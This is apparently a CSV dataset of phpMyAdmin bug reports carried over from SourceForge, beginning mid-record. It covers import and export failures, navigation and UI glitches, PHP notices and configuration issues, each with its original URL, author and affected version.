, args , line 42, column 1 , context [ }); , } , }); , ; , , AJAX.scriptHandler.done ); ], filename pmd init.js } ], useragent Mozilla 5.0 Macintosh; Intel Mac OS X 10.10; rv 38.0) Gecko 20100101 Firefox 38.0 , incomplete false , uri db designer.php?target= }, script name db designer.php , microhistory { pages [ { hash index.php?db=test table= server=1 target= token=762abf7bf5135945490cf8095f2ccae3 }, { hash db structure.php?db=xsses table= server=1 target= token=762abf7bf5135945490cf8095f2ccae3 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang en , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Browse , pma text left default tab Structure , pma text left default tab2 false , LimitChars 50 , pftext , confirm true , LoginCookieValidity 1440 , logged in true , default fk check value 1 , auth type cookie } }, { hash db designer.php?db=xsses table= server=1 target= token=762abf7bf5135945490cf8095f2ccae3 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang en , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Browse , pma text left default tab Structure , pma text left default tab2 false , LimitChars 50 , pftext , confirm true , LoginCookieValidity 1440 , logged in true , default fk check value 1 , auth type cookie } } ], current index 3 } } < pre> Original URL https sourceforge.net p phpmyadmin bugs 4958 Original author ibennetch Found in version Latest Git","bug"
"24444","11057","Leading and trailing whitespace in column name.
When creating a column name it s possible to enter whitespace before or after the column name and probably elsewhere also).
This can happen for example when copy and pasting into the input field or inadvertently hitting the space bar.
MySQL allows this which is weird) It should be standard practice to use trim ) for anything like this.
Original URL https sourceforge.net p phpmyadmin bugs 4659 Original author suomedia Found in version 4.3.2","bug"
"24444","11058","Duplicate column name error.
Hi When we try to add a column to an existing table,it says duplicate column name column name .
though the column gets added properly Original URL https sourceforge.net p phpmyadmin bugs 4662 Original author rakeshkaundilya Found in version Latest Git","bug"
"24444","11059","insert by foreign key scrolls page to top.
Hi, when I m inserting data manually there is problem with page scrolling up when foreign key is selected.
Reproduce Insert > Continue with intersection 40 rows selected Then I scroll little bit down for insert 5th, 6th,... row, I select Browse foreign values , search for needed value and click on it.
Value is inserted, but page is scrolled totally up, now I need to scroll down for next row, select Browse foreign values and the same happens.
Solution is to search for needed value, close Browse foreign values dialog and insert value manually, but it s not comfortable solution.
Same on 4.5.0dev Original URL https sourceforge.net p phpmyadmin bugs 4962 Original author lucius silencio Found in version 4.4.9","bug"
"24444","11060","Export missing back ticks for order table name.
When doing an export with a table named order , the export is not putting the `back ticks` around the name which causes an error when trying to import.
Original URL https sourceforge.net p phpmyadmin bugs 4663 Original author bskrtich Found in version 4.3.3","bug"
"24444","11061","Improve restore non unique index row editing.
More a regression issue rather than a bug, but it seems in PMA 4.x versions the feature was removed to be able to edit non unique table rows.
Formerly, the WHERE condition would simply take all columns to be able to edit a row.
I know this has been removed to ensure that updating a row does not update other rows by accident .
But removing the feature to edit such rows alltogether is IMO prevent users from using a tool like phpMyAdmin properly, and would need to make them resort to other tools.
I would like to suggest either one of two things 1.)
Allow a config option to make people ignore the issues such editing would have, and restore PMA < 4.0 behaviour for editing rows.
2.)
the better way) When a temporary WHERE condition is built, execute a query to check if there is more than one result to edit the data.
Then issue a huge warning when editing such rows, that updating the data may yield to unexpected results.
I am so far away from the current codebase that I sadly can t offer to check this out on my own.
But I am working with some projects where unique keys in tables have not been set because of reasons ) but we still need to edit data, and can no longer use recent phpMyAdmin versions for this.
I know of several other developers who are annoyed by this...
Original URL https sourceforge.net p phpmyadmin bugs 4963 Original author garvinhicking Found in version 4.4.9","bug"
"24444","11062","New version using older files.
Clicking the New pseudo table entry in a database branch in the left side tree view calling tbl create.php) returns a > Fatal error Cannot redeclare class Application Octetstream Download in E \Programme\xampp\phpmyadmin\libraries\plugins\transformations\Application Octetstream Download.class.php on line 42 as result in the right side main frame just below the table headers.
Original URL https sourceforge.net p phpmyadmin bugs 4964 Original author ligh1l Found in version 4.4.10","bug"
"24444","11063","Field named 0 is not recognized.
Create a table with following SQL CREATE TABLE `a` `b` varchar 10) NOT NULL, `0` timestamp NOT NULL DEFAULT CURRENT TIMESTAMP ON UPDATE CURRENT TIMESTAMP ) ENGINE=InnoDB DEFAULT CHARSET=latin1 Go to table structure page, select both columns and click edit.
Even though both fields are being edited the details of the first column is repeated on the second as well.
Original URL https sourceforge.net p phpmyadmin bugs 4967 Original author madhuracj Found in version Latest Git","bug"
"24444","11064","Show me the central list of columns throws js error.
Clicking on Show me the central list of columns that are not already in this table instead of intended behavior of showing some list, throws JSON parse error on data.message See https reports.phpmyadmin.net reports view 4685 filename functions.js if !
db table in central column list)) { central column list.push db table); .ajax { type POST , url href, data params, success function data) { central column list[db table] = .parseJSON data.message); }, async false }); I m not sure if suppressing the exception will be good in case data.message has to be empty or do we really need some value in data.message that is missing here?
Original URL https sourceforge.net p phpmyadmin bugs 4665 Original author atul5 Found in version 4.3.3","bug"
"24444","11065","Undefined indexes in table stucture print view of a view.
Notice in .\libraries\tbl printview.lib.php 93 Undefined index actor id Backtrace .\libraries\tbl printview.lib.php 489 PMA getHtmlForPrintViewColumns array, array, boolean true, array, string sakila , string actor info , array, ) .\libraries\tbl printview.lib.php 585 PMA getHtmlForTableStructure boolean true, boolean true, array, array, array, string sakila , string actor info , array, array, array, string left , ) .\tbl printview.php 65 PMA getHtmlForTablesDetail array, string sakila , array, array, string left , ) Notice in .\libraries\tbl printview.lib.php 93 Undefined index first name Original URL https sourceforge.net p phpmyadmin bugs 4666 Original author madhuracj Found in version 4.3.0","bug"
"24444","11066","Consistency in borders.
Browse table isn t consistent with Structure table https sourceforge.net p phpmyadmin bugs 4648 Original URL https sourceforge.net p phpmyadmin bugs 4667 Original author olafvdspek Found in version 4.3.3","bug"
"24444","11067","Remove from central columns error.
Notice in .
libraries central columns.lib.php 313 Undefined index db When trying to remove a column from central colums Backtrace .
libraries mult submits.lib.php 531 PMA deleteColumnsFromList array, boolean false, ) .
libraries mult submits.inc.php 120 PMA getDataForSubmitMult string remove from central columns , string ipt , string addedrequests , array, string tbl structure.php , ) .
tbl structure.php 80 include .
libraries mult submits.inc.php) Original URL https sourceforge.net p phpmyadmin bugs 4668 Original author olafvdspek Found in version 4.3.3","bug"
"24444","11068","Cannot redeclare class Application Octetstream Download .
When I want to edit or add tables fields the error is occured Fatal error Cannot redeclare class Application Octetstream Download in usr share phpmyadmin libraries plugins transformations Application Octetstream Download.class.php on line 42 Server Localhost via UNIX socket Server type MariaDB Server version 5.5.41 MariaDB 1 wheezy mariadb.org binary distribution Protocol version 10 You have to delete a object instance declaration in this file.
Original URL https sourceforge.net p phpmyadmin bugs 4669 Original author wilhelmsempre Found in version 4.3.3","bug"
"24444","11069","CSV import reads both commas and values into first column after first row.
Importing a CSV file under 4.3.3 results in all entries except the first row ignoring comma separators and filling the first column up to its limit, writing both commas and values into the cell until it is full.
Strangely, the following columns still contain the correct values as if they had observed the comma separators.
This import functions correctly under phpmyadmin 4.2.9, and also functions correctly under 4.3.3 with CSV using LOAD DATA .
The file was prepared with LibreOffice under Windows 7 x64, with CR and LF line termination.
The behaviour is still observed when changing the separator to a semicolon and specifying this in the phpmyadmin import.
I therefore think this is a regression in phpmyadmin 4.3 , since I also observed it in 4.3.2 Server side phpmyadmin 4.3.3 MySQL 5.5.40 PHP 5.5.9 Ubuntu 14.04.1 Client side LibreOffice 4.3.5.2 Chrome 39.0.2171.95 Table structure and sample import file to reproduce this attached.
The CSV is ugly but semantically correct, database design is yuck, I know...
CREATE TABLE IF NOT EXISTS `import test 433` `ArticleID` varchar 128) COLLATE utf8mb4 unicode ci NOT NULL DEFAULT , `Headline` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `JiebaoLink` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `ArticleLink` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `OriginalArticle` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `MediaOutlet` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `Section` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `PublishDate` datetime DEFAULT NULL, `MediaType` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `NewsSource` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `OriginalMedia` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `OriginalDate` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `ArticleLength` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `GPSpecialRequest` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `GPCampaign` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `GPProject` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `Output` varchar 255) COLLATE utf8mb4 unicode ci DEFAULT NULL, `GPMention` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `Tone` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `Reactive` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `HookDescription` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `GPPhoto` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `RelatedArticle` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `NewlyAdded` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL, `Notes` varchar 256) COLLATE utf8mb4 unicode ci DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4 unicode ci; ALTER TABLE `import test 433` ADD PRIMARY KEY `ArticleID`); Original URL https sourceforge.net p phpmyadmin bugs 4670 Original author strophy Found in version 4.3.3 Attachment http sourceforge.net p phpmyadmin bugs 4670 attachment 4.2.9 import result.png Attachment http sourceforge.net p phpmyadmin bugs 4670 attachment 4.3.3 import result.png Attachment http sourceforge.net p phpmyadmin bugs 4670 attachment 201412 Week3 Small.csv","bug"
"24444","11070","Unable to move all columns.
If a table has a large number of columns and cannot be displayed in the pop up.
You are unable to move any columns out of the viewport and you are not able to see the Ok or Cancel button to save the new move order.
See attached screenshot.
Screen resolution is 1920x1080 Original URL https sourceforge.net p phpmyadmin bugs 4671 Original author challgren Found in version 4.3.3 Attachment http sourceforge.net p phpmyadmin bugs 4671 attachment Untitled.png","bug"
"24444","11071","Distinct values does not page.
When you click the Distinct Values button, the query is executed correctly.
But!
You cannot sort the results I like to sort them at the amount of Rows), and neither can I page go to the xth page).
And neither do I see the total rows amount.
It looks like this query is interpreted as an insert statement or so?
Original URL https sourceforge.net p phpmyadmin bugs 4672 Original author g00fy Found in version 4.3.3","bug"
"24444","11072","Cannot read property status of null.
This report is related to user submitted report [ 11357] https reports.phpmyadmin.net reports view 11357) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4980 Original author phpmyadmin bot Found in version 4.4.10","bug"
"24444","11073","Delimiter causing page lock.
This is related to http sourceforge.net p phpmyadmin bugs 4600 Whenever I insert data into a column there is a delimiter field above the console with default value ; .
Now if I browse to another table or column my web browser says You have unsaved changes are you sure you want to leave this page?
I think it s the delimiter because when I click GO on that that and insert the same value for the second time by doing that) the message is gone.
This is very annoying especially if you have to insert a lot of data.
I added a screenshot as well.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 4673 Original author marvel79 Found in version 4.3.3 Attachment http sourceforge.net p phpmyadmin bugs 4673 attachment delimiter.png","bug"
"24444","11074","Characters display issues when charset of db was utf8mb4.
I stored some Chinese characters with `utf8mb4` on MySQL 5.6.
They are fine in the database confirmed by using `mysql` command line under MAC.
But phpMyAdmin show all Chinese characters as messy codes.
Original URL https sourceforge.net p phpmyadmin bugs 4674 Original author falconia Found in version 4.3.3","bug"
"24444","11075","Theme configurations not defined.
This report is related to user submitted report [ 11922] https reports.phpmyadmin.net reports view 11922) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4983 Original author phpmyadmin bot Found in version 4.4.11","bug"
"24444","11076","phpMyAdmin should be able to work without examples DIR.
phpMyAdmin should be able to work without examples DIR.
examples is a folder which should not be essential for the tool to work.
Example Warning in .
libraries relation.lib.php 1820 file get contents .
examples create tables.sql) failed to open stream No such file or directory see attachement for more info No PMA config stuff is enabled in config.inc.php and no phpmyadmin database is created from examples create tables.sql.
I never needed this Or is it now a must for having pma config and phpmyadmin DB ???
Original URL https sourceforge.net p phpmyadmin bugs 4675 Original author jimmik Found in version 4.3.4 Attachment http sourceforge.net p phpmyadmin bugs 4675 attachment PMA examples warn.jpg","bug"
"24444","11077","Auto configuration issues.
Issue 1 After the automatic creation of tables see at the end of libraries common.inc.php), it looks like the phpMyAdmin configuration storage features are not enabled.
For example, I create a favorite but it s not stored in pma favorite; or I am not offered a dialog to create a bookmark.
Issue 2 I suspect a performance problem in PMA fixPMATables ).
There, a loop tries to create each table instead of verifying whether it already exists.
Issue 3 I am no longer sure that it s a good idea to automatically create these tables on entering a db when ZeroConf is true) without notifying the user.
Original URL https sourceforge.net p phpmyadmin bugs 4676 Original author lem9 Found in version 4.3.4","bug"
"24444","11078","Advanced feature checker does not check for favorite tables feature.
Fixed with https github.com phpmyadmin phpmyadmin commit 44647b7eb62ceb89c747421740542c506e906d87 Original URL https sourceforge.net p phpmyadmin bugs 4677 Original author madhuracj Found in version 4.3.0","bug"
"24444","11079","Setup does not allow providing a name for favorites table.
Resolved with https github.com phpmyadmin phpmyadmin commit 9d2880a1c53bdc52e22dd645406655a2b36aa41d Original URL https sourceforge.net p phpmyadmin bugs 4679 Original author madhuracj Found in version 4.3.0","bug"
"24444","11080","Number of favorite table are not configurable in setup.
Original URL https sourceforge.net p phpmyadmin bugs 4680 Original author madhuracj Found in version 4.3.0","bug"
"24444","11081","4.3.3 4.3.4 Import sql created by mysqldump fails on foreign keys.
Server type MySQL Server version 5.6.21 MySQL Community Server GPL) Protocol version 10 User root localhost Server charset UTF 8 Unicode utf8) OS X 10.10.1 Created .sql export using mysqldump Prior to phpmyadmin 4.3.3 not sure which) the import .sql would work, no issues.
phpmyadmin 4.2.13.1 which I m using now does import .sql with no issues.
Versions 4.3.3 and 4.3.4 both fail the import .sql the same way when it hits a foreign key When creating the export .sql in phpmyadmin, any of the above version work on the import but these export files are much larger than mysqldump which I use in a command line script If you need any more info please contact me Gary Original URL https sourceforge.net p phpmyadmin bugs 4682 Original author gspyder Found in version 4.3.4","bug"
"24444","11082","Relational data is not properly updated on table rename.
Relational data such as ui preferences are not updated to reflect table renaming Original URL https sourceforge.net p phpmyadmin bugs 4683 Original author madhuracj Found in version 4.3.0","bug"
"24444","11083","Selenium test while deleting the user..
If we try to delete the user, there are two alerts shown See Attachments .
I found this while running the functional tests.
Original URL https sourceforge.net p phpmyadmin bugs 4684 Original author devenbhooshan Found in version 4.3.4 Attachment http sourceforge.net p phpmyadmin bugs 4684 attachment Screenshot 20from 202015 01 03 2019 3A47 3A25.png Attachment http sourceforge.net p phpmyadmin bugs 4684 attachment Screenshot 20from 202015 01 03 2019 3A47 3A35.png","bug"
"24444","11084","Call to a member function isUserType ) on a non object.
PHP Fatal error Call to a member function isUserType ) on a non object in phpMyAdmin 4.3.4 english libraries Menu.class.php on line 511 I just downloaded the archive, uncompressed it, and tried to access it.
I updated from a former version where I was logged in.
I cleared my cookies, tried another browser, but no luck.
If you need more information, please ask.
Original URL https sourceforge.net p phpmyadmin bugs 4685 Original author ci dev Found in version 4.3.4","bug"
"24444","11085","Select elements flicker and selects something else.
The select elements across phpMyAdmin flickers when I try to open it and trying to select one option with mouse.
Many times if the list is long and scrollable, selecting some option results in selection of some other option normally above the intended option, from first several options in select).
This happens with Google Chrome 39.0.2171.71 64 bit) on Ubuntu 14.04.
This does not happen in Firefox on the same OS.
I tested some long select boxes outside phpMyAdmin.
But they does not seem to act like this flicker).
Original URL https sourceforge.net p phpmyadmin bugs 4686 Original author nisargjhaveri Found in version 4.3.0","bug"
"24444","11086","file permissions in archive.
I am using the archive phpMyAdmin 4.3.5 english.tar.xz .
.
phpMyAdmin 4.3.5 english js codemirror addon runmode runmode.js .
phpMyAdmin 4.3.5 english js codemirror lib codemirror.js .
phpMyAdmin 4.3.5 english js codemirror mode sql sql.js .
phpMyAdmin 4.3.5 english themes original img console.png .
phpMyAdmin 4.3.5 english themes pmahomme img console.png The files above are executable, even though I do not see a reason for why they should be.
Can this be fixed?
Original URL https sourceforge.net p phpmyadmin bugs 4688 Original author ci dev Found in version 4.3.5","bug"
"24444","11087","Setup tool creates pma favorites incorrectly.
When using the setup tool to fill in the table names of the configuration storage tables, all the tables are created with two underscores in their names EXCEPT pma favorites , which is filled in with just one underscore when you click the pencil icon to auto fill the table name.
Manually adding an underscore fixes the error indicating that favorites was disabled.
Original URL https sourceforge.net p phpmyadmin bugs 4689 Original author rkenimer Found in version 4.3.5","bug"
"24444","11088","Hang after import completes.
With the same setup noted in my ticket 4682 the import mysqldump now works but causes phpmyadmin to hang loop as soon as the import successful message appears, clicking on any link command or database) does nothing, only the logout icon works.
The testx.sql file I attached in ticket 4682 will hang loop, along with other imports I tried.
Original URL https sourceforge.net p phpmyadmin bugs 4690 Original author gspyder Found in version 4.3.5","bug"
"24444","11089","Do not include console when no server is selected.
Original URL https sourceforge.net p phpmyadmin bugs 4691 Original author madhuracj Found in version 4.3.0","bug"
"24444","11090","Dynamic javascripts gives 500 when db selected.
`js messages.php?lang=en db=db name token=token` fails with 500 and `js messages.php?lang=en db= token=token` works.
Original URL https sourceforge.net p phpmyadmin bugs 4692 Original author nisargjhaveri Found in version 4.3.5","bug"
"24444","11091","phpMyAdmin sometimes hangs after login.
I have noticed an uncommonly high load our phpMyAdmin server after upgrading to version 4.3.5, which seems to be related to a strange login issue that one of my coworkers just ran into After a successful login into phpMyAdmin, the interface seems to hang, no database table, menu or button can be selected except logout).
However, there are still outgoing calls from the browser to the webserver, as I am seeing a lot of the following lines in the webserver log corresponding to the client IP) 80.153.91.0 [07 Jan 2015 10 25 54 0100] GET error report.php?ajax request=true server=2 token=c02077a12ada91e6fd3155a331fdc880 get settings=true exception type=js nocache=1420622754562659805 HTTP 1.1 200 1216 https mysql.variomedia.de index.php?db=db12345 table=auth code target=sql.php server=2 token=c02077a12ada91e6fd3155a331fdc880 Mozilla 5.0 X11; Ubuntu; Linux x86 64; rv 34.0) Gecko 20100101 Firefox 34.0 These entries repeat serveral times per second and only stop after logging out.
I can find these repeating log entries for different IPs and browsers Firefox, Chrome, Safari), so it s probably not a browser specific problem.
However, I could not reproduce the error, on my computer phpMyAdmin works perfectly with the same databases.
Same with my coworker who discovered this issue, a few hours later he tried again and everything worked fine.
I use a setup with multiple database servers and cookie authentication.
This issue is similar to Ticket 4690, but happens directly after login, not after importing an SQL dump.
Original URL https sourceforge.net p phpmyadmin bugs 4693 Original author tobias vrmd Found in version 4.3.5","bug"
"24444","11092","Changing cfg[ DefaultTabTable ] doesn t update link and title.
On changing cfg[ DefaultTabTable ] to a non default value the navi panel doesn t update to reflect the new table name links.
in navi panel, the title of the table name link still remains Browse instead of Search or Insert .
Original URL https sourceforge.net p phpmyadmin bugs 4695 Original author atul5 Found in version 4.3.6","bug"
"24444","11093","create tables.sql is missing CREATE TABLE statement for pma designer coords.
create tables.sql is missing CREATE TABLE statement for creating pma designer coords table without which I believe the Designer tab won t show which indeed doesn t for me).
Here is my config.inc.php configuration Generated configuration file Generated by phpMyAdmin 4.3.6 setup script Date Thu, 08 Jan 2015 00 14 53 0800 cfg[ UploadDir ] = ; cfg[ SaveDir ] = ; cfg[ ForceSSL ] = true; cfg[ blowfish secret ] = 54ae3c5bd1cef6.60544224 ; cfg[ DefaultLang ] = en ; cfg[ ServerDefault ] = 1; i=0; i ; phpMyAdmin configuration storage settings.
User used to manipulate with storage cfg[ Servers ][ i][ controlhost ] = ; cfg[ Servers ][ i][ controlport ] = ; cfg[ Servers ][ i][ controluser ] = root ; cfg[ Servers ][ i][ controlpass ] = rootpassword ; Storage database and tables cfg[ Servers ][ i][ pmadb ] = phpmyadmin ; cfg[ Servers ][ i][ bookmarktable ] = pma bookmark ; cfg[ Servers ][ i][ relation ] = pma relation ; cfg[ Servers ][ i][ table info ] = pma table info ; cfg[ Servers ][ i][ table coords ] = pma table coords ; cfg[ Servers ][ i][ pdf pages ] = pma pdf pages ; cfg[ Servers ][ i][ column info ] = pma column info ; cfg[ Servers ][ i][ history ] = pma history ; cfg[ Servers ][ i][ table uiprefs ] = pma table uiprefs ; cfg[ Servers ][ i][ tracking ] = pma tracking ; cfg[ Servers ][ i][ userconfig ] = pma userconfig ; cfg[ Servers ][ i][ recent ] = pma recent ; cfg[ Servers ][ i][ favorite ] = pma favorite ; cfg[ Servers ][ i][ users ] = pma users ; cfg[ Servers ][ i][ usergroups ] = pma usergroups ; cfg[ Servers ][ i][ navigationhiding ] = pma navigationhiding ; cfg[ Servers ][ i][ savedsearches ] = pma savedsearches ; cfg[ Servers ][ i][ central columns ] = pma central columns ; Contrib Swekey authentication cfg[ Servers ][ i][ auth swekey config ] = etc swekey pma.conf ; End of servers configuration Original URL https sourceforge.net p phpmyadmin bugs 4698 Original author supportzz Found in version 4.3.6","bug"
"24444","11094","Navigation panel should not hide icons based on TableNavigationLinksMode .
TableNavigationLinksMode configuration is for begin , previous , next , end links.
Original URL https sourceforge.net p phpmyadmin bugs 4699 Original author madhuracj Found in version 4.3.0","bug"
"24444","11095","Error text Internal Server Error.
When I load phpMyAdmin 4.3.6 for the first time a browser session, I get the following red error box error.
Maybe it is related to a non present cookie?
Error in Processing Request Error code 500 Error text Internal Server Error This happens at the first page where I am supposed to select a server in a multi server setup, so basically at https .
I do not have a Persistent favorite tables enabled.
The Firefox developer tools show the query POST https db structure.php?ajax request=1 favorite table=1 sync favorite tables=1 lang=en collation connection=utf8 unicode ci token= Request body favorite tables= nocache= Request headers Host User Agent Mozilla 5.0 X11; Ubuntu; Linux x86 64; rv 29.0) Gecko 20100101 Firefox 29.0 Accept Accept Language en gb,en;q=0.5 Accept Encoding gzip, deflate DNT 1 Content Type application x www form urlencoded; charset=UTF 8 X Requested With XMLHttpRequest Referer https Content Length 45 Cookie phpMyAdmin= ; pma lang=en; pma collation connection=utf8 unicode ci Connection keep alive Pragma no cache Cache Control no cache Original URL https sourceforge.net p phpmyadmin bugs 4700 Original author ci dev Found in version 4.3.6","bug"
"24444","11096","session expired URL loop on session expiry via ajax.
Version information 4.2.12deb2 Upon session expiry via an ajax request, the page seems to enter an infinite loop appending session expired to the URL, eg https pma index.php?db=x;table=x;target=tbl replace.php;token=2d19ae859c6febc2dd70757bd3052390 PMAURL 10 sql.php?db=x;table=x;server=1;target=;token=2d19ae859c6febc2dd70757bd3052390 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 session expired=1 Original URL https sourceforge.net p phpmyadmin bugs 4701 Original author r1ch Found in version 4.2.12","bug"
"24444","11097","URL is non RFC 2396 compatible in get scripts.js.php.. Hi, there is non RFC ULR encoding in get scripts.js.php.
From https www.ietf.org rfc rfc2396.txt ============ 2.4.3.
Excluded US ASCII Characters Other characters are excluded because gateways and other transport agents are known to sometimes modify such characters, or they are used as delimiters.
unwise = { | } | | | \ | | [ | ] | ` Data corresponding to excluded characters must be escaped in order to be properly represented within a URI.
============== The problem is in parameter scripts[] .
It is not RFC compatible.
In previous version of phpMyAdmin 3.X) there wasn t such problem.
> https XXX YYY phpMyAdmin js get scripts.js.php?scripts[]=jquery jquery 1.8.3.min.js scripts[]=sprintf.js scripts[]=ajax.js scripts[]=keyhandler.js scripts[]=jquery jquery ui 1.9.2.custom.min.js scripts[]=jquery jquery.cookie.js scripts[]=jquery jquery.mousewheel.js scripts[]=jquery jquery.event.drag 2.2.js scripts[]=jquery jquery ui timepicker addon.js scripts[]=jquery jquery.ba hashchange 1.3.js scripts[]=jquery jquery.debounce 1.0.5.js scripts[]=menu resizer.js scripts[]=cross framing protection.js scripts[]=rte.js scripts[]=tracekit tracekit.js scripts[]=error report.js scripts[]=doclinks.js scripts[]=functions.js scripts[]=navigation.js scripts[]=indexes.js scripts[]=common.js scripts[]=codemirror lib codemirror.js scripts[]=codemirror mode sql sql.js scripts[]=codemirror addon runmode runmode.js scripts[]=codemirror addon hint show hint.js scripts[]=codemirror addon hint sql hint.js Due to this RFC our hardware SSL terminator and L7 firewall is dropping connection to this request while others are OK.
Original URL https sourceforge.net p phpmyadmin bugs 4702 Original author majherek Found in version 4.3.6","bug"
"24444","11098","Table structure adding primary key doesn t refresh page.
As mentioned here)[http stackoverflow.com a 27921408 2385479], when on the table structure page and clicking at least) the Primary or Unique actions, the page should refresh to show that they are now grey.
Doing so will also fix another minor annoyance, in this case the slider doesn t automatically expand my InitialSiderState is open ) but should.
Original URL https sourceforge.net p phpmyadmin bugs 4705 Original author ibennetch Found in version 4.3.9","bug"
"24444","11099","Schema export doesn t handle dots in db table name.
Original URL https sourceforge.net p phpmyadmin bugs 4706 Original author madhuracj Found in version 4.3.0","bug"
"24444","11100","Call to undefined method PMA Schema PDF dieSchema ).
Original URL https sourceforge.net p phpmyadmin bugs 4707 Original author madhuracj Found in version 4.3.0","bug"
"24444","11101","WebsitePanel silent login issues.
Since upgrading to 4.3.4 WebsitePanel can no longer silently login, you always get Cannot login to the MySQL server .
Once you get this error, PHPMyAdmin will then not even allow you to login to the account manually at the PHPMyAdmin login screen) regardless if you type the password correctly.
If I do a silent login for user A it gets rejected, type the password over and over correctly it continues to say could not login to the mysql server.
If I change the login to anything even jibber) and login it rejects me which is correct), I can then type in the user A provide the password and PHPMyAdmin allows me to login without issues.
I ve verified that WebsitePanel is POSTing the pma username= and pma password= values as well as verified that they are correct.
Even tried creating a new user new database and the issue persists.
Using PHPMyAdmin 4.3.6, PHP v5.4.36 though this happens with 5.5 and 5.6 as well) and MySQL 5.6.20.
Original URL https sourceforge.net p phpmyadmin bugs 4708 Original author echodreamz Found in version 4.3.6","bug"
"24444","11102","Cannot browse table if sorting column is renamed.
If you create a table, fill in some data, sort by a specific column, and then rename that specific column to something else, you will be unable to then browse that table.
Deleting dropping a table and then recreating said table will still result in the inability to browse that table unless the column is renamed back to its original assigning.
Original URL https sourceforge.net p phpmyadmin bugs 4709 Original author jonyoung Found in version 4.1.12","bug"
"24444","11103","Nav tree error after filtering the tables.
1.
Log into a server which has many databases 2.
Use pagination arrows or the dropdown to get to another page from the first one 3.
Use the filter to find a database 4.
Click on it Original URL https sourceforge.net p phpmyadmin bugs 4710 Original author keep2000 Found in version 4.3.7 Attachment http sourceforge.net p phpmyadmin bugs 4710 attachment pma2.jpg","bug"
"24444","11104","WHITESCREEN.
Error causing WHITE SCREEN phpmyadmin.css img.sortableIcon { background position 0 2352px; height 16px; width 16px; } th.headerSortUp img.sortableIcon { background position 0 1968px; height 16px; width 16px; } th.headerSortDown img.sortableIcon { background position 0 2080px; height 16px; width 16px; } xefxbfxbdx08xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdx03x03xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd Original URL https sourceforge.net p phpmyadmin bugs 4711 Original author robikkubik Found in version 4.3.7","bug"
"24444","11105","Database size is not displayed anymore.
choose a database from the left navigation panel that includes tables scroll down to the end of the page there is no summarize of the size of all tables anymore Original URL https sourceforge.net p phpmyadmin bugs 4713 Original author schattenfell Found in version 4.3.7","bug"
"24444","11106","Forced ORDER BY for own sql statements.
browse a database table example table click on a column of this table to order by that data field phpmyadmin will execute SELECT FROM `example table` ORDER BY `data field` DESC now click on SQL to execute an own statement SELECT FROM `example table` even though I do not want a specific order by, the old order by is forced by phpmyadmin SELECT FROM `example table` ORDER BY `data field` DESC phpmyadmin should not force such saved settings on own statements in the console Original URL https sourceforge.net p phpmyadmin bugs 4714 Original author schattenfell Found in version 4.3.7","bug"
"24444","11107","Create table doesn t refresh navigation panel.
execute an own sql statement like CREATE TABLE IF NOT EXISTS `example` [...] after submitting the query the navigation panel on the left side is not refreshed for the database selected Original URL https sourceforge.net p phpmyadmin bugs 4715 Original author schattenfell Found in version 4.3.7","bug"
"24444","11108","Collapse all in navigation panel is sometimes broken.
create two databases, that get grouped because of their names, example database de test database de live create some tables inside the databases open one database in the left database navigation panel by clicking on ), ) and then database de test now choose one table and delete it the navigation panel on the left side will now refresh the problem now is, that all ) buttons of the two levels above the final database change from ) to ), even though they are still opened and cannot be used anymore furthermore the Collapse all ) on the top cannot be used to close all open databases anymore Original URL https sourceforge.net p phpmyadmin bugs 4716 Original author schattenfell Found in version 4.3.7","bug"
"24444","11109","Database navigation menu broken when resolution screen is changing.
since phpmyadmin 4.3.x sth.
changed in seperating the database navigation panel on the left side and the main content on the right side I use multiple screens with different screen resolutions the first problem is just annoying and not urgent if I move the phpmyadmin window from a screen with low resolution 1280x720) to a screen with high resolution 1920x1080) I have to re adjust the border between the navigation panel and the main content more then expected, there seem to be no real the second problem is critical if I use phpmyadmin on a screen with high resolution 1920x1080), e.g.
